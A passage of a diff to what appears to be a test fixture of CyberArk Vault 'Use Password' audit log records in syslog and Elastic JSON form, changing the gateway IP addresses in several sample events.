 </CAProperties>\n  </audit_record>\n</syslog>","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}}
-<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:12</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:12Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>FOR FUN.</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>For fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:49</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>Because I say so</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:30</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>for fun</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:17</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>10.0.2.2</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>testing</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:54</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:26</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:49</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:12</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:12Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>fun and profit</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 